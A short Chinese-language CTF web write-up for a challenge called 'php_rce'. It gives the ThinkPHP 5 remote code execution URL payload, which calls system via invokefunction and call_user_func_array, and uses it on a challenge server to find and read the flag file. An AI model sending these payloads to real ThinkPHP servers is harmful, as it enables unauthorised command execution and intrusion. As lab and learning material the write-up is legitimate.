CTFweb(四)

CTFweb writeup 每日更新,php_rce

1.php_rce

额,这个之前没见过。后来了解到Thinkphp 5 有漏洞 漏洞介绍

http://IP/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=指令

比如执行,查找flag文件

http://111.198.29.45:43429/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "*flag"

显示 /flag /flag

直接打开flag文件

http://111.198.29.45:43429/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

得到 flag{thinkphp5_rce} 

这个题有特殊性吧,不知道漏洞是解不出来。积累一下。

第二道题遇到了点问题,随后会更新。

发表评论